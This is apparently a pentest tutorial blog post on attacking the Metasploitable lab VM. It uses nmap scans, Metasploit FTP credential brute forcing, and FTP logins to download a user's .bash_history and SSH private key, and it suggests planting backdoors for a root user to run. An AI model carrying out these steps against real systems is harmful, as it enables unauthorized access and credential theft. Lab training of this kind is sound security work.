, ,
/ \
((_---,,,---_))
(_)O O(_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 727 exploits - 372 auxiliary - 78 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13625 updated today (2011.08.24)
msf >
We start with identifying any live hosts by doing a nmap ping scan.
msf > nmap -sP 172.72.5.2-254
[*] exec: nmap -sP 172.72.5.2-254
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:04 IST
Nmap scan report for 172.72.5.143
Host is up (0.00042s latency).
MAC Address: 00:0C:29:8D:8D:A4 (VMware)
Nmap scan report for 172.72.5.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FD:82:EC (VMware)
Nmap done: 253 IP addresses (2 hosts up) scanned in 5.06 seconds
msf >
We find our target metasploitable system with IP 172.72.5.143. Let's gather information on services running in the target.
sV -> probe open ports to identify service / version info
sT -> TCP Connect scan. Perform a 3-way TCP handshake. can take time but very reliable
msf > nmap -sV -sT 172.72.5.143
[*] exec: nmap -sV -sT 172.72.5.143
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:07 IST
Nmap scan report for 172.72.5.143
Host is up (0.00043s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux
Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
We will explore these services one by one and see what we can find with each.
1. 21/tcp open ftp ProFTPD 1.3.1
1. 21/tcp open ftp ProFTPD 1.3.1
Metasploit auxiliary module -> auxiliary/scanner/ftp/ftp_login
set PASS_FILE /opt/metasploit_open/msf3/data/wordlists/unix_passwords.txt
set USER_FILE /opt/metasploit_open/msf3/data/wordlists/unix_users.txt
setg RHOSTS 172.72.5.143
run
[+] 172.72.5.143:21 - Successful FTP login for 'postgres':'postgres'
[*] 172.72.5.143:21 - User 'postgres' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'service':'service'
[*] 172.72.5.143:21 - User 'service' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'user':'user'
[*] 172.72.5.143:21 - User 'user' has READ/WRITE access
We have 3 ftp login credentials now. Let's use these IDs to login to the target.
root@victor:tmp# ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): user
331 Password required for user
Password:
230 User user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 .
-rw------- 1 user user 165 May 7 2010 .bash_history
drwx------ 2 user user 4096 May 7 2010 .ssh
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 user user 220 Mar 31 2010 .bash_logout
-rw-r--r-- 1 user user 2928 Mar 31 2010 .bashrc
-rw-r--r-- 1 user user 586 Mar 31 2010 .profile
226 Transfer complete
.bash_history keeps a history of commands a user has run. Many a times in pentests, I've found useful info on targets, as user ID, passwords, confidential file names, locations, important server names, shared resources etc in this little file.
I will download this file.
Remember Information Gathering is a continuous, on-going phase during a penetration test. You will build upon the collected information to leverage access into the target environment.
There is also a .ssh directory. Checking it tells us the presence of public & private ssh keys of the 'user'.ftp> get .bash_historylocal: .bash_history remote: .bash_history
200 PORT command successful
150 Opening BINARY mode data connection for .bash_history (165 bytes)
226 Transfer complete
165 bytes received in 0.00 secs (41.6 kB/s)
In a pentest, you may come across a scenario where SSH is permitted for device / server administration but passwords are not used. Instead, public key authentication is configured. This means, if you can obtain ssh keys of a [ privileged ] user, then you can gain straight access to the resources without the need of knowing login password. Also, in certain environments, access and security is tied to trusts. Once you can impersonate a 'trusted' / authorized user, gaining access to other juicy resources is a piece of cake.We go into the .ssh directory and see there is the key pair. Private key is what we will need. Download it.
ftp> cd .ssh250 CWD command successful
ftp> ls -lta
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 ..
drwx------ 2 user user 4096 May 7 2010 .
-rw------- 1 user user 668 May 7 2010 id_dsa
-rw-r--r-- 1 user user 609 May 7 2010 id_dsa.pub
226 Transfer complete
ftp> get id_dsa
local: id_dsa remote: id_dsa
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa (668 bytes)
226 Transfer complete
668 bytes received in 0.00 secs (327.8 kB/s)
ftp> get id_dsa.pub
local: id_dsa.pub remote: id_dsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa.pub (609 bytes)
226 Transfer complete
609 bytes received in 0.00 secs (379.8 kB/s)
ftp> bye
From .bash_history file, a new user 'msfadmin' seems to be present on the target box.
root@victor:tmp# cat bash_history-userssh-keygen -t dsa
ls
cd .ssh
ls
sudo -s
cd /home/user
lsls .ss
ls .ssj
clear
ls .ssh
sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys
sudo -s
exit
After brute forcing, it is confirmed that just like with previous 3 users, msfadmin is a joe account, meaning that the password is same as the user id -> msfadmin. FTP login using msfadmin is successful.
ftp 172.72.5.143Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw------- 1 msfadmin msfadmin 806 May 18 2010 .bash_history
drwxr-xr-x 5 msfadmin msfadmin 4096 May 18 2010 .
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 98 Apr 28 2010 .lesshst
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
The user has Read/Write privileges using FTP service. Even though these users are non-root accounts, and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or root privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include and are not limited to gaining shell, execute commands, sniff sensitive data off the wire and send the logs to the attacker, enumerate other systems in the network environment for further exploitation etc, and many more.
In a pentest, however, always document any changes you've made to the file system and remember to clean up exe, configuration changes etc, before you sign off for the day. Normally, the any changes by the pentester and associated risk must be discussed with customer and arrived at, in the Terms of Engagement.
Next up --> Exploring SSH service
No comments:
Post a Comment